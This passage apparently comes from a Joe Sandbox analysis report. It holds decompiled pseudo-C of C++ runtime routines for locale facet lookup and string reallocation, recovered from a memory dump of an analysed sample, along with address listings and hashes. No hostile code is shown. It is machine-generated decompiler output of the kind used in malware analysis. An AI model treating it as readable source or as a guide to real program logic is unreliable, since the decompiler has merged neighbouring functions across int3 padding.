				signed int _t114;
				void* _t117;

				_t97 = __edx;
				_push(0xffffffff);
				_push(0x432135);
				_push( *[fs:0x0]);
				_t112 = _t111 - 0x1c;
				_t47 =  *0x443048; // 0x35200185
				_t48 = _t47 ^ _t109;
				_v20 = _t48;
				_push(_t48);
				 *[fs:0x0] =  &_v16;
				_v44 = __ecx;
				_t77 =  &(__ecx[2]);
				_v36 = _t77;
				E0041247D( &_v32, 0);
				_v8 = 0;
				_t52 =  *0x444f58; // 0x0
				_t99 =  *0x444fd4; // 0x0
				_v24 = _t52;
				_v40 = _t52;
				if(_t99 == 0) {
					E0041247D( &_v28, _t99);
					_t117 =  *0x444fd4 - _t99; // 0x0
					if(_t117 == 0) {
						_t74 =  *0x444310; // 0x2
						_t75 = _t74 + 1;
						 *0x444310 = _t75;
						 *0x444fd4 = _t75;
					}
					E004124D5( &_v28);
					_t99 =  *0x444fd4; // 0x0
				}
				_t84 = _t77[1];
				_t78 = _t99 * 4;
				if(_t99 >=  *((intOrPtr*)(_t84 + 0xc))) {
					_t105 = 0;
					__eflags = 0;
					goto L9;
				} else {
					_t105 =  *(_t78 +  *((intOrPtr*)(_t84 + 8)));
					if(_t105 == 0) {
						L9:
						__eflags =  *((char*)(_t84 + 0x14));
						if( *((char*)(_t84 + 0x14)) == 0) {
							L12:
							__eflags = _t105;
							if(_t105 != 0) {
								goto L6;
							} else {
								goto L13;
							}
						} else {
							_t69 = E0041265A();
							__eflags = _t99 -  *((intOrPtr*)(_t69 + 0xc));
							if(_t99 >=  *((intOrPtr*)(_t69 + 0xc))) {
								L13:
								_t105 = _v24;
								_t100 = _v36;
								__eflags = _t105;
								if(_t105 != 0) {
									goto L7;
								} else {
									_push(_t100);
									_t57 = E0040BBE0(_t78, _t97, _t100,  &_v40);
									_t114 = _t112 + 8;
									__eflags = _t57 - 0xffffffff;
									if(__eflags == 0) {
										E00403390();
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										_push(_t109);
										_t110 = _t114;
										_push(0xfffffffe);
										_push(0x441408);
										_push(E004148C0);
										_push( *[fs:0x0]);
										_push(_t78);
										_push(_t105);
										_push(_t100);
										_t60 =  *0x443048; // 0x35200185
										 *(_t110 - 8) =  *(_t110 - 8) ^ _t60;
										_push(_t60 ^ _t110);
										 *[fs:0x0] = _t110 - 0x10;
										_t102 = _t84;
										 *(_t110 - 0x24) = _t84;
										_t107 = 0;
										__eflags = 0;
										_v88 = 0;
										 *((char*)(_t110 - 0x19)) = 0;
										_v60 = 0;
										while(1) {
											__eflags = _t107 - 1;
											if(_t107 >= 1) {
												break;
											}
											E0040BE80(_t107 * 0x2c + _t102);
											_t107 = _t107 + 1;
											_v40 = _t107;
										}
										_v33 = 1;
										_v12 = 0xfffffffe;
										_t64 = E0040B5F2(1, _t102, _t107);
										 *[fs:0x0] = _v24;
										return _t64;
									} else {
										_t105 = _v40;
										_v24 = _t105;
										_v8 = 1;
										E0041262E(__eflags, _t105);
										_t112 = _t114 + 4;
										 *((intOrPtr*)( *_t105 + 4))();
										 *0x444f58 = _t105;
										goto L7;
									}
								}
							} else {
								_t105 =  *(_t78 +  *((intOrPtr*)(_t69 + 8)));
								goto L12;
							}
						}
					} else {
						L6:
						_t100 = _v36;
						L7:
						_v8 = 0xffffffff;
						E004124D5( &_v32);
						_t79 = _v44;
						 *_t79 = _t105;
						_t79[1] = E00408230(_t79, _t100);
						 *[fs:0x0] = _v16;
						_pop(_t101);
						_pop(_t106);
						_pop(_t80);
						return E0041361E(_t54, _t80, _v20 ^ _t109, _t97, _t101, _t106);
					}
				}
			}

0x0040b420
0x0040b423
0x0040b425
0x0040b430
0x0040b431
0x0040b434
0x0040b439
0x0040b43b
0x0040b441
0x0040b445
0x0040b44d
0x0040b450
0x0040b458
0x0040b45b
0x0040b460
0x0040b467
0x0040b46c
0x0040b472
0x0040b475
0x0040b47a
0x0040b480
0x0040b485
0x0040b48b
0x0040b48d
0x0040b492
0x0040b493
0x0040b498
0x0040b498
0x0040b4a0
0x0040b4a5
0x0040b4a5
0x0040b4ab
0x0040b4ae
0x0040b4b8
0x0040b503
0x0040b503
0x00000000
0x0040b4ba
0x0040b4bd
0x0040b4c2
0x0040b505
0x0040b505
0x0040b509
0x0040b51b
0x0040b51b
0x0040b51d
0x00000000
0x00000000
0x00000000
0x00000000
0x0040b50b
0x0040b50b
0x0040b510
0x0040b513
0x0040b51f
0x0040b51f
0x0040b522
0x0040b525
0x0040b527
0x00000000
0x0040b529
0x0040b52c
0x0040b52e
0x0040b533
0x0040b536
0x0040b539
0x0040b560
0x0040b565
0x0040b566
0x0040b567
0x0040b568
0x0040b569
0x0040b56a
0x0040b56b
0x0040b56c
0x0040b56d
0x0040b56e
0x0040b56f
0x0040b570
0x0040b571
0x0040b573
0x0040b575
0x0040b57a
0x0040b585
0x0040b589
0x0040b58a
0x0040b58b
0x0040b58c
0x0040b591
0x0040b596
0x0040b59a
0x0040b5a0
0x0040b5a2
0x0040b5a5
0x0040b5a5
0x0040b5a7
0x0040b5aa
0x0040b5ae
0x0040b5b1
0x0040b5b1
0x0040b5b4
0x00000000
0x00000000
0x0040b5bb
0x0040b5c0
0x0040b5c1
0x0040b5c1
0x0040b5c8
0x0040b5cb
0x0040b5d2
0x0040b5da
0x0040b5e8
0x0040b53b
0x0040b53b
0x0040b53e
0x0040b542
0x0040b546
0x0040b54d
0x0040b552
0x0040b555
0x00000000
0x0040b555
0x0040b539
0x0040b515
0x0040b518
0x00000000
0x0040b518
0x0040b513
0x0040b4c4
0x0040b4c4
0x0040b4c4
0x0040b4c7
0x0040b4ca
0x0040b4d1
0x0040b4d6
0x0040b4da
0x0040b4e4
0x0040b4ea
0x0040b4f2
0x0040b4f3
0x0040b4f4
0x0040b502
0x0040b502
0x0040b4c2

APIs

std::_Lockit::_Lockit.LIBCPMT ref: 0040B45B
std::_Lockit::_Lockit.LIBCPMT ref: 0040B480
std::_Lockit::~_Lockit.LIBCPMT ref: 0040B4A0
std::_Lockit::~_Lockit.LIBCPMT ref: 0040B4D1
std::_Facet_Register.LIBCPMT ref: 0040B546
Concurrency::cancel_current_task.LIBCPMT ref: 0040B560

Memory Dump Source

Source File: 00000006.00000002.573079819.0000000000400000.00000040.00000001.01000000.00000006.sdmp, Offset: 00400000, based on PE: true

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_6_2_400000_C676.jbxd

Similarity

API ID: std::_$Lockit$Lockit::_Lockit::~_$Concurrency::cancel_current_taskFacet_Register
String ID:
API String ID: 2081738530-0
Opcode ID: 2f7d90d21418b20c93bf01a52f06efe2ca2bff106cf229284d8034bb01d851a6
Instruction ID: 1b4fa618c6b9974cefa89f8aee00e08efa53829ab8ceb4a341dcdc8ee2c60516
Opcode Fuzzy Hash: 2f7d90d21418b20c93bf01a52f06efe2ca2bff106cf229284d8034bb01d851a6
Instruction Fuzzy Hash: 8D41CE75D002189FCB11DF94D981B9EB7B0EB49724F14056AE815B7382DB38AE05CBE8

Uniqueness

Uniqueness Score: -1.00%

Function 004088A0 Relevance: 9.1, APIs: 6, Instructions: 103
COMMON

Download Yara Rule

C-Code - Quality: 45%

			E004088A0(void* __ebx, void* __edi, void* __esi, signed int _a4, char _a8) {
				char _v0;
				intOrPtr _v4;
				char _v8;
				signed int _v16;
				signed int _v20;
				signed int _v24;
				signed int _v28;
				signed int _v32;
				signed int _v36;
				signed int _v56;
				signed int _v68;
				signed int _v80;
				signed int _v92;
				signed int _v112;
				signed int _v124;
				signed int _v148;
				signed int _t154;
				signed int _t155;
				void* _t157;
				void* _t162;
				void* _t163;
				intOrPtr _t164;
				signed int _t191;
				unsigned int _t193;
				void* _t194;
				signed int _t209;
				signed int _t211;
				signed int _t213;
				unsigned int _t215;
				void* _t216;
				intOrPtr _t219;
				signed int _t232;
				signed int _t234;
				signed int _t236;
				unsigned int _t238;
				void* _t239;
				signed int _t248;
				signed int _t250;
				void* _t254;
				signed int _t258;
				void* _t259;
				signed int* _t260;
				signed int* _t261;
				signed int _t269;
				intOrPtr _t275;
				signed int* _t276;
				void* _t280;
				signed int _t284;
				void* _t286;
				void* _t293;
				void* _t296;
				intOrPtr _t299;
				signed int _t300;
				signed int _t301;
				signed int _t302;
				intOrPtr _t306;
				signed int _t308;
				signed int _t309;
				signed int _t311;
				void* _t312;
				signed int _t314;
				signed int _t326;
				signed int _t327;
				void* _t328;
				signed int _t329;
				signed int _t331;
				signed int _t332;
				intOrPtr _t333;
				void* _t335;
				signed int _t336;
				signed int _t339;
				signed int _t340;
				signed int _t342;
				signed int _t345;
				signed int _t346;
				signed int _t348;
				signed int _t351;
				signed int _t353;
				signed int _t357;
				void* _t359;
				void* _t361;
				void* _t362;
				signed int _t371;
				void* _t372;
				void* _t374;
				void* _t375;
				signed int _t376;

				_t357 = _t371;
				_push(0xffffffff);
				_push(0x431c55);
				_push( *[fs:0x0]);
				_t372 = _t371 - 0x14;
				_t154 =  *0x443048; // 0x35200185
				_t155 = _t154 ^ _t357;
				_v20 = _t155;
				_push(__ebx);
				_push(__esi);
				_push(__edi);
				_push(_t155);
				 *[fs:0x0] =  &_v16;
				_t326 = _a4;
				_t268 =  &_v32;
				_v28 = _t326;
				_t157 = E0041247D( &_v32, 0);
				_v8 = 0;
				_t311 =  *0x444fd0; // 0x0
				_t258 =  *0x444f40; // 0x0
				_v36 = _t258;
				if(_t311 == 0) {
					__ecx =  &_v24;
					__eax = E0041247D( &_v24, __edi);
					__eflags =  *0x444fd0 - __edi; // 0x0
					if(__eflags == 0) {
						__eax =  *0x444310; // 0x2
						__eax = __eax + 1;
						__eflags = __eax;
						 *0x444310 = __eax;
						 *0x444fd0 = __eax;
					}
					__ecx =  &_v24;
					__eax = E004124D5(__ecx);
					__edi =  *0x444fd0; // 0x0
				}
				_t298 =  *(_t326 + 4);
				_t269 = _t311 * 4;
				_v24 = _t269;
				__eflags = _t311 -  *((intOrPtr*)(_t298 + 0xc));
				if(_t311 >=  *((intOrPtr*)(_t298 + 0xc))) {
					_t327 = 0;
					__eflags = 0;
					_v24 = _t269;
					goto L17;
				} else {
					_t327 =  *(_t269 +  *((intOrPtr*)(_t298 + 8)));
					__eflags = _t327;
					if(_t327 != 0) {
						L25:
						E004124D5( &_v32);
						 *[fs:0x0] = _v16;
						_pop(_t312);
						_pop(_t328);
						_pop(_t259);
						__eflags = _v20 ^ _t357;
						return E0041361E(_t327, _t259, _v20 ^ _t357, _t298, _t312, _t328);
					} else {
						L17:
						__eflags =  *((char*)(_t298 + 0x14));
						if( *((char*)(_t298 + 0x14)) == 0) {
							L20:
							__eflags = _t327;
							if(_t327 != 0) {
								goto L25;
							} else {
								goto L21;
							}
						} else {
							_t254 = E0041265A();
							__eflags = _t311 -  *((intOrPtr*)(_t254 + 0xc));
							if(_t311 >=  *((intOrPtr*)(_t254 + 0xc))) {
								L21:
								__eflags = _t258;
								if(_t258 == 0) {
									_t162 = E00408E80(_t258, _t311, _t327,  &_v36, _v28);
									_t374 = _t372 + 8;
									__eflags = _t162 - 0xffffffff;
									if(__eflags == 0) {
										_t163 = E00403390();
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										asm("int3");
										_push(_t357);
										_t359 = _t374;
										_push(_t327);
										_push(_t311);
										_t311 = _t298;
										_t329 = _t269;
										__eflags = _t329 - _t311;
										if(_t329 == _t311) {
											L35:
											return _t163;
										} else {
											do {
												_t275 =  *((intOrPtr*)(_t329 + 0x14));
												__eflags = _t275 - 0x10;
												if(_t275 < 0x10) {
													goto L34;
												} else {
													_t164 =  *_t329;
													_t276 = _t275 + 1;
													__eflags = _t276 - 0x1000;
													if(_t276 < 0x1000) {
														L33:
														_push(_t276);
														_t163 = E004138AD(_t164);
														_t374 = _t374 + 8;
														goto L34;
													} else {
														_t299 =  *((intOrPtr*)(_t164 - 4));
														_t276 =  &(_t276[8]);
														__eflags = _t164 - _t299 + 0xfffffffc - 0x1f;
														if(_t164 - _t299 + 0xfffffffc > 0x1f) {
															E0041805F(_t258, _t276, _t299);
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															asm("int3");
															_push(_t359);
															_t361 = _t374;
															_t375 = _t374 - 0xc;
															_push(_t258);
															_t260 = _t276;
															_t277 = 0x7fffffff;
															_push(_t329);
															_t331 = _v56;
															_t300 = _t260[4];
															_v68 = _t300;
															_push(_t311);
															__eflags = 0x7fffffff - _t300 - _t331;
															if(0x7fffffff - _t300 < _t331) {
																E00401BD0(_t260, 0x7fffffff, _t300);
																goto L58;
															} else {
																_t311 = _t260[5];
																_t236 = _t300 + _t331;
																_v24 = _t236;
																_t351 = _t236 | 0x0000000f;
																_v20 = _t311;
																__eflags = _t351 - 0x7fffffff;
																if(_t351 <= 0x7fffffff) {
																	_t238 = _t311 >> 1;
																	_t277 = 0x7fffffff - _t238;
																	__eflags = _t311 - _t277;
																	if(_t311 <= _t277) {
																		_t239 = _t238 + _t311;
																		__eflags = _t351 - _t239;
																		_t331 =  <  ? _t239 : _t351;
																		_t60 = _t331 + 1; // 0x80000000
																		_t277 = _t60;
																		__eflags = _t277 - 0x1000;
																		if(_t277 < 0x1000) {
																			__eflags = _t277;
																			if(__eflags == 0) {
																				_t311 = 0;
																				__eflags = 0;
																			} else {
																				_t248 = E0041362C(_t260, _t311, _t331, __eflags, _t277);
																				_t300 = _v16;
																				_t375 = _t375 + 4;
																				_t311 = _t248;
																			}
																			goto L51;
																		} else {
																			_t61 = _t277 + 0x23; // 0x80000023
																			_t249 = _t61;
																			__eflags = _t61 - _t277;
																			if(__eflags <= 0) {
																				L58:
																				E00401B30();
																				goto L59;
																			} else {
																				goto L41;
																			}
																		}
																	} else {
																		_t331 = 0x7fffffff;
																		goto L40;
																	}
																} else {
																	_t331 = 0x7fffffff;
																	L40:
																	_t249 = 0xffffffff80000023;
																	__eflags = 0x80000000;
																	L41:
																	_t250 = E0041362C(_t260, _t311, _t331, __eflags, _t249);
																	_t375 = _t375 + 4;
																	__eflags = _t250;
																	if(_t250 == 0) {
																		L59:
																		E0041805F(_t260, _t277, _t300);
																		asm("int3");
																		asm("int3");
																		asm("int3");
																		asm("int3");
																		_push(_t361);
																		_t362 = _t375;
																		_t376 = _t375 - 0x14;
																		_push(_t260);
																		_t261 = _t277;
																		_t278 = 0x7fffffff;
																		_push(_t331);
																		_t332 = _v80;
																		_t301 = _t261[4];
																		_v92 = _t301;
																		_push(_t311);
																		__eflags = 0x7fffffff - _t301 - _t332;
																		if(0x7fffffff - _t301 < _t332) {
																			E00401BD0(_t261, 0x7fffffff, _t301);
																			goto L81;
																		} else {
																			_t311 = _t261[5];
																			_t213 = _t301 + _t332;
																			_v24 = _t213;
																			_t345 = _t213 | 0x0000000f;
																			_v28 = _t311;
																			__eflags = _t345 - 0x7fffffff;
																			if(_t345 <= 0x7fffffff) {
																				_t215 = _t311 >> 1;
																				_t278 = 0x7fffffff - _t215;
																				__eflags = _t311 - _t278;
																				if(_t311 <= _t278) {
																					_t216 = _t215 + _t311;
																					__eflags = _t345 - _t216;
																					_t332 =  <  ? _t216 : _t345;
																					_t90 = _t332 + 1; // 0x80000000
																					_t278 = _t90;
																					__eflags = _t278 - 0x1000;
																					if(_t278 < 0x1000) {
																						__eflags = _t278;
																						if(__eflags == 0) {
																							_t311 = 0;
																							__eflags = 0;
																						} else {
																							_t232 = E0041362C(_t261, _t311, _t332, __eflags, _t278);
																							_t301 = _v20;
																							_t376 = _t376 + 4;
																							_t311 = _t232;
																						}
																						goto L74;
																					} else {
																						_t91 = _t278 + 0x23; // 0x80000023
																						_t233 = _t91;
																						__eflags = _t91 - _t278;
																						if(__eflags <= 0) {
																							L81:
																							E00401B30();
																							goto L82;
																						} else {
																							goto L64;
																						}
																					}
																				} else {
																					_t332 = 0x7fffffff;
																					goto L63;
																				}
																			} else {
																				_t332 = 0x7fffffff;
																				L63:
																				_t233 = 0xffffffff80000023;
																				__eflags = 0x80000000;
																				L64:
																				_t234 = E0041362C(_t261, _t311, _t332, __eflags, _t233);
																				_t376 = _t376 + 4;
																				__eflags = _t234;
																				if(_t234 == 0) {
																					L82:
																					E0041805F(_t261, _t278, _t301);
																					asm("int3");
																					asm("int3");
																					asm("int3");
																					asm("int3");
																					_push(_t362);
																					_t357 = _t376;
																					_t372 = _t376 - 0x10;
																					_push(_t261);
																					_t258 = _t278;
																					_t279 = 0x7fffffff;
																					_push(_t332);
																					_t326 = _v112;
																					_t302 =  *((intOrPtr*)(_t258 + 0x10));
																					_v124 = _t302;
																					_push(_t311);
																					__eflags = 0x7fffffff - _t302 - _t326;
																					if(0x7fffffff - _t302 < _t326) {
																						E00401BD0(_t258, 0x7fffffff, _t302);
																						goto L104;
																					} else {
																						_t311 =  *(_t258 + 0x14);
																						_t191 = _t302 + _t326;
																						_v28 = _t191;
																						_t339 = _t191 | 0x0000000f;
																						_v32 = _t311;
																						__eflags = _t339 - 0x7fffffff;
																						if(_t339 <= 0x7fffffff) {
																							_t193 = _t311 >> 1;
																							_t279 = 0x7fffffff - _t193;
																							__eflags = _t311 - _t279;
																							if(_t311 <= _t279) {
																								_t194 = _t193 + _t311;
																								__eflags = _t339 - _t194;
																								_t326 =  <  ? _t194 : _t339;
																								_t130 = _t326 + 1; // 0x80000000
																								_t279 = _t130;
																								__eflags = _t279 - 0x1000;
																								if(_t279 < 0x1000) {
																									__eflags = _t279;
																									if(__eflags == 0) {
																										_t311 = 0;
																										__eflags = 0;
																									} else {
																										_t209 = E0041362C(_t258, _t311, _t326, __eflags, _t279);
																										_t302 = _v24;
																										_t372 = _t372 + 4;
																										_t311 = _t209;
																									}
																									goto L97;
																								} else {
																									_t131 = _t279 + 0x23; // 0x80000023
																									_t210 = _t131;
																									__eflags = _t131 - _t279;
																									if(__eflags <= 0) {
																										L104:
																										E00401B30();
																										goto L105;
																									} else {
																										goto L87;
																									}
																								}
																							} else {
																								_t326 = 0x7fffffff;
																								goto L86;
																							}
																						} else {
																							_t326 = 0x7fffffff;
																							L86:
																							_t210 = 0xffffffff80000023;
																							__eflags = 0x80000000;
																							L87:
																							_t211 = E0041362C(_t258, _t311, _t326, __eflags, _t210);
																							_t372 = _t372 + 4;
																							__eflags = _t211;
																							if(_t211 == 0) {
																								L105:
																								_t157 = E0041805F(_t258, _t279, _t302);
																								asm("int3");
																								asm("int3");
																								asm("int3");
																								asm("int3");
																								asm("int3");
																								_t268 =  *_t279;
																								__eflags = _t268;
																								if(_t268 != 0) {
																									_push(_t311);
																									_t314 = _t268;
																									_t280 =  *_t314;
																									if(_t280 == 0) {
																										L6:
																										return _t157;
																									} else {
																										_push(_t326);
																										_push(_t280);
																										L27();
																										_t333 =  *_t314;
																										_t284 = (0x2aaaaaab * ( *((intOrPtr*)(_t314 + 8)) - _t333) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * ( *((intOrPtr*)(_t314 + 8)) - _t333) >> 0x20 >> 2) + ((0x2aaaaaab * ( *((intOrPtr*)(_t314 + 8)) - _t333) >> 0x20 >> 2 >> 0x1f) + (0x2aaaaaab * ( *((intOrPtr*)(_t314 + 8)) - _t333) >> 0x20 >> 2)) * 2 << 3;
																										if(_t284 < 0x1000) {
																											L5:
																											_push(_t284);
																											_t157 = E004138AD(_t333);
																											 *_t314 = 0;
																											 *((intOrPtr*)(_t314 + 4)) = 0;
																											 *((intOrPtr*)(_t314 + 8)) = 0;
																											goto L6;
																										} else {
																											_t306 =  *((intOrPtr*)(_t333 - 4));
																											_t284 = _t284 + 0x23;
																											_t335 = _t333 - _t306;
																											if(_t335 - 4 > 0x1f) {
																												E0041805F(_t258, _t284, _t306);
																												asm("int3");
																												asm("int3");
																												asm("int3");
																												asm("int3");
																												asm("int3");
																												asm("int3");
																												asm("int3");
																												asm("int3");
																												asm("int3");
																												asm("int3");
																												asm("int3");
																												asm("int3");
																												_push(_t357);
																												__eflags = _v148 & 0x00000001;
																												_push(_t335);
																												_t336 = _t284;
																												 *_t336 = 0x4337e4;
																												if((_v148 & 0x00000001) != 0) {
																													_push(8);
																													E004138AD(_t336);
																												}
																												return _t336;
																											} else {
																												_t333 = _t306;
																												goto L5;
																											}
																										}
																									}
																								} else {
																									return _t157;
																								}
																							} else {
																								_t302 = _v24;
																								_t128 = _t211 + 0x23; // 0x23
																								_t311 = _t128 & 0xffffffe0;
																								 *(_t311 - 4) = _t211;
																								L97:
																								 *((intOrPtr*)(_t258 + 0x10)) = _v28;
																								_v24 = _v0;
																								 *(_t258 + 0x14) = _t326;
																								_t340 = _t311 + _t302;
																								_v36 = _t340;
																								__eflags = _v32 - 0x10;
																								_v28 = _v4 + _t340;
																								_push(_t302);
																								if(_v32 < 0x10) {
																									_push(_t258);
																									_push(_t311);
																									E00414BF0();
																									E00415180(_t311, _t340, _v24, _v4);
																									 *_v28 = 0;
																									 *_t258 = _t311;
																									return _t258;
																								} else {
																									_t342 =  *_t258;
																									_push(_t342);
																									_push(_t311);
																									E00414BF0();
																									E00415180(_t311, _v36, _v24, _v4);
																									_t372 = _t372 + 0x18;
																									_t286 = _v32 + 1;
																									 *_v28 = 0;
																									__eflags = _t286 - 0x1000;
																									if(_t286 < 0x1000) {
																										L101:
																										_push(_t286);
																										E004138AD(_t342);
																										 *_t258 = _t311;
																										return _t258;
																									} else {
																										_t302 =  *((intOrPtr*)(_t342 - 4));
																										_t279 = _t286 + 0x23;
																										_t326 = _t342 - _t302;
																										_t149 = _t326 - 4; // 0x7ffffffb
																										__eflags = _t149 - 0x1f;
																										if(_t149 > 0x1f) {
																											goto L105;
																										} else {
																											_t342 = _t302;
																											goto L101;
																										}
																									}
																								}
																							}
																						}
																					}
																				} else {
																					_t301 = _v20;
																					_t88 = _t234 + 0x23; // 0x23
																					_t311 = _t88 & 0xffffffe0;
																					 *(_t311 - 4) = _t234;
																					L74:
																					_t261[4] = _v24;
																					_v20 = _a8;
																					_t219 = _v0;
																					_t261[5] = _t332;
																					_push(_t219);
																					_v32 = _t301 - _t219 + 1;
																					_t346 = _t311 + _t219;
																					_v36 = _t346;
																					__eflags = _v28 - 0x10;
																					_v24 = _a4 + _t346;
																					if(_v28 < 0x10) {
																						_push(_t261);
																						_push(_t311);
																						E00414BF0();
																						E00415180(_t311, _t346, _v20, _a4);
																						__eflags = _v0 + _t261;
																						E00414BF0(_v24, _v0 + _t261, _v32);
																						 *_t261 = _t311;
																						return _t261;
																					} else {
																						_t348 =  *_t261;
																						_push(_t348);
																						_push(_t311);
																						E00414BF0();
																						E00415180(_t311, _v36, _v20, _a4);
																						E00414BF0(_v24, _v0 + _t348, _v32);
																						_t376 = _t376 + 0x24;
																						_t293 = _v28 + 1;
																						__eflags = _t293 - 0x1000;
																						if(_t293 < 0x1000) {
																							L78:
																							_push(_t293);
																							E004138AD(_t348);
																							 *_t261 = _t311;
																							return _t261;
																						} else {
																							_t301 =  *(_t348 - 4);
																							_t278 = _t293 + 0x23;
																							_t332 = _t348 - _t301;
																							_t114 = _t332 - 4; // 0x7ffffffb
																							__eflags = _t114 - 0x1f;
																							if(_t114 > 0x1f) {
																								goto L82;
																							} else {
																								_t348 = _t301;
																								goto L78;
																							}
																						}
																					}
																				}
																			}
																		}
																	} else {
																		_t300 = _v16;
																		_t58 = _t250 + 0x23; // 0x23
																		_t311 = _t58 & 0xffffffe0;
																		 *(_t311 - 4) = _t250;
																		L51:
																		__eflags = _v20 - 0x10;
																		_t260[4] = _v24;
																		_t260[5] = _t331;
																		_push(_t300);
																		if(_v20 < 0x10) {
																			_push(_t260);
																			_push(_t311);
																			E00414BF0();
																			_t308 = _v16;
																			 *((char*)(_t311 + _t308)) = _a4;
																			 *((char*)(_t311 + _t308 + 1)) = 0;
																			 *_t260 = _t311;
																			return _t260;
																		} else {
																			_t353 =  *_t260;
																			_push(_t353);
																			_push(_t311);
																			E00414BF0();
																			_t309 = _v16;
																			_t375 = _t375 + 0xc;
																			_t296 = _v20 + 1;
																			 *((char*)(_t311 + _t309)) = _a4;
																			 *((char*)(_t311 + _t309 + 1)) = 0;
																			__eflags = _t296 - 0x1000;
																			if(_t296 < 0x1000) {
																				L55:
																				_push(_t296);
																				E004138AD(_t353);
																				 *_t260 = _t311;
																				return _t260;
																			} else {
																				_t300 =  *(_t353 - 4);
																				_t277 = _t296 + 0x23;
																				_t331 = _t353 - _t300;
																				_t74 = _t331 - 4; // 0x7ffffffb
																				__eflags = _t74 - 0x1f;
																				if(_t74 > 0x1f) {
																					goto L59;
																				} else {
																					_t353 = _t300;
																					goto L55;
																				}
																			}
																		}
																	}
																}
															}
														} else {
															_t164 = _t299;
															goto L33;
														}
													}
												}
												goto L108;
												L34:
												 *((intOrPtr*)(_t329 + 0x10)) = 0;
												 *((intOrPtr*)(_t329 + 0x14)) = 0xf;
												 *_t329 = 0;
												_t329 = _t329 + 0x18;
												__eflags = _t329 - _t311;
											} while (_t329 != _t311);
											goto L35;
										}
									} else {
										_t327 = _v36;
										_v28 = _t327;
										_v8 = 1;
										E0041262E(__eflags, _t327);
										_t298 =  *_t327;
										 *((intOrPtr*)( *_t327 + 4))();
										 *0x444f40 = _t327;
										goto L25;
									}
								} else {
									_t327 = _t258;
									goto L25;
								}
							} else {
								_t327 =  *(_v24 +  *((intOrPtr*)(_t254 + 8)));
								goto L20;
							}
						}
					}
				}
				L108:
			}

0x004088a1
0x004088a3
0x004088a5
0x004088b0
0x004088b1
0x004088b4
0x004088b9
0x004088bb
0x004088be
0x004088bf
0x004088c0
0x004088c1
0x004088c5
0x004088cb
0x004088ce
0x004088d3
0x004088d6
0x004088db
0x004088e2
0x004088e8
0x004088ee
0x004088f3
0x004088f6
0x004088f9
0x004088fe
0x00408904
0x00408906
0x0040890b
0x0040890b
0x0040890c
0x00408911
0x00408911
0x00408916
0x00408919
0x0040891e
0x0040891e
0x00408924
0x00408927
0x0040892e
0x00408931
0x00408934
0x00408942
0x00408942
0x00408944
0x00000000
0x00408936
0x00408939
0x0040893c
0x0040893e
0x004089a0
0x004089a3
0x004089ad
0x004089b5
0x004089b6
0x004089b7
0x004089bb
0x004089c5
0x00408940
0x00408947
0x00408947
0x0040894b
0x00408960
0x00408960
0x00408962
0x00000000
0x00000000
0x00000000
0x00000000
0x0040894d
0x0040894d
0x00408952
0x00408955
0x00408964
0x00408964
0x00408966
0x00408973
0x00408978
0x0040897b
0x0040897e
0x004089c6
0x004089cb
0x004089cc
0x004089cd
0x004089ce
0x004089cf
0x004089d0
0x004089d1
0x004089d3
0x004089d4
0x004089d5
0x004089d7
0x004089d9
0x004089db
0x00408a27
0x00408a2a
0x004089e0
0x004089e0
0x004089e0
0x004089e3
0x004089e6
0x00000000
0x004089e8
0x004089e8
0x004089ea
0x004089eb
0x004089f1
0x00408a05
0x00408a05
0x00408a07
0x00408a0c
0x00000000
0x004089f3
0x004089f3
0x004089f6
0x004089fe
0x00408a01
0x00408a2b
0x00408a30
0x00408a31
0x00408a32
0x00408a33
0x00408a34
0x00408a35
0x00408a36
0x00408a37
0x00408a38
0x00408a39
0x00408a3a
0x00408a3b
0x00408a3c
0x00408a3d
0x00408a3e
0x00408a3f
0x00408a40
0x00408a41
0x00408a43
0x00408a46
0x00408a47
0x00408a49
0x00408a50
0x00408a51
0x00408a54
0x00408a59
0x00408a5c
0x00408a5d
0x00408a5f
0x00408b6d
0x00000000
0x00408a65
0x00408a65
0x00408a68
0x00408a6d
0x00408a70
0x00408a73
0x00408a76
0x00408a78
0x00408aa5
0x00408aa7
0x00408aa9
0x00408aab
0x00408ab4
0x00408ab6
0x00408ab8
0x00408abb
0x00408abb
0x00408abe
0x00408ac4
0x00408ad3
0x00408ad5
0x00408ae7
0x00408ae7
0x00408ad7
0x00408ad8
0x00408add
0x00408ae0
0x00408ae3
0x00408ae3
0x00000000
0x00408ac6
0x00408ac6
0x00408ac6
0x00408ac9
0x00408acb
0x00408b72
0x00408b72
0x00000000
0x00408ad1
0x00000000
0x00408ad1
0x00408acb
0x00408aad
0x00408aad
0x00000000
0x00408aad
0x00408a7a
0x00408a7a
0x00408a7c
0x00408a81
0x00408a81
0x00408a84
0x00408a85
0x00408a8a
0x00408a8d
0x00408a8f
0x00408b77
0x00408b77
0x00408b7c
0x00408b7d
0x00408b7e
0x00408b7f
0x00408b80
0x00408b81
0x00408b83
0x00408b86
0x00408b87
0x00408b89
0x00408b90
0x00408b91
0x00408b94
0x00408b99
0x00408b9c
0x00408b9d
0x00408b9f
0x00408ced
0x00000000
0x00408ba5
0x00408ba5
0x00408ba8
0x00408bad
0x00408bb0
0x00408bb3
0x00408bb6
0x00408bb8
0x00408be5
0x00408be7
0x00408be9
0x00408beb
0x00408bf4
0x00408bf6
0x00408bf8
0x00408bfb
0x00408bfb
0x00408bfe
0x00408c04
0x00408c13
0x00408c15
0x00408c27
0x00408c27
0x00408c17
0x00408c18
0x00408c1d
0x00408c20
0x00408c23
0x00408c23
0x00000000
0x00408c06
0x00408c06
0x00408c06
0x00408c09
0x00408c0b
0x00408cf2
0x00408cf2
0x00000000
0x00408c11
0x00000000
0x00408c11
0x00408c0b
0x00408bed
0x00408bed
0x00000000
0x00408bed
0x00408bba
0x00408bba
0x00408bbc
0x00408bc1
0x00408bc1
0x00408bc4
0x00408bc5
0x00408bca
0x00408bcd
0x00408bcf
0x00408cf7
0x00408cf7
0x00408cfc
0x00408cfd
0x00408cfe
0x00408cff
0x00408d00
0x00408d01
0x00408d03
0x00408d06
0x00408d07
0x00408d09
0x00408d10
0x00408d11
